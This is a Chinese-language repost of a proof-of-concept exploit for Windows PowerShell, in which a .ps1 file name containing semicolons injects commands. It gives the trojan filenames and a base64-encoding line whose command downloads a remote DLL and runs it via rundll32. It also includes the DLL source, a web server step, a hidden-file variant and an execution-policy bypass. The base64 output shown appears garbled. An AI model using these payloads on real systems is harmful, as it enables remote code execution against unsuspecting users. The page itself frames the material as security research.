发现:John Page(又名 hyp3rlinx)2019 年和 2023 年修订
由于它仍然有效,我除尘并做了一些小改进:
使用 rundll32 执行远程 DLL
执行意外的辅助 PS1 脚本或本地文本文件(可以隐藏)
更新了 PS1 木马文件名创建器 Python3 脚本
最早于 2019 年向 Microsoft 报告,但截至撰写本文时仍未修复。
通过特制的文件名远程执行代码。
缺陷是由于分号“;” 我们可以解码 Base64 命令并直接从 PS1 文件名或仅执行命令执行。
Test;POweRsHeLL -e [BASE64 UTF-16LE PAYLOAD];.ps1直接调用命令
"Testing;saps (gc -) PoC;.ps1"矢量图:双击、拖放至PS快捷方式
利用替代的速记 PS 命令,如“saps”、“gc”启动进程和获取内容等。
DLL 执行示例:
创建一个木马 PS1 文件,它将尝试下载并执行名为“1.d”的远程 DLL
Python:从 base64 导入 b64encodeb64encode("saps http[]//127.0.0.1/1.d;sleep -s 2;rundll32 $HOMEDownloads1.d, 0".encode('UTF-16LE'))cwBhAHAAcwAgACAAaAB0AHQACAA6AC8ALwAxADIANwAuADAALgAwAC4AMQAvADEALgBkADsAcwBsAGUAZQBwACAALQBzACAAMgA7AHIAdQBuAGQabABsADAMAMgAgACQASABPAE0ARQBcAEQABwB3AG4AbABvAGEAZ ABzAFwAMQAuAGQALAgADAA
动态链接库代码:
//gcc -shared -o mydll.dll mydll.c -m32//hyp3rlinxvoid evilo(void){MessageBox(0,"Filename Remote Code Execution PoCrnBy hyp3rlinx","M$ Windows PowerShell",1);}BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved){evilo();return 0;}
python -m http.server 80双击木马 PS1 文件。
文本文件代码执行示例:
创建一个名称包含 saps“启动进程”和 gc“获取内容”的 PS1 文件,这将从隐藏文件中读取命令。
"Test;saps (gc -) PoC;.ps1"创建隐藏:attrib +s +h "-"
双击或拖放。
要求:
a) PowerShell PS1 文件必须设置为使用 PowerShell 作为默认程序打开
b) Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy 绕过 -Force
c) 用户必须双击、从 cmd 行运行或拖放恶意命名的 PS1 脚本
https://www.youtube.com/watch?v=-ZJnA70Cf4I
项目地址:
https://github.com/hyp3rlinx/PSTrojanFile
原文始发于微信公众号(Ots安全):Windows PowerShell 木马文件 RCE
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论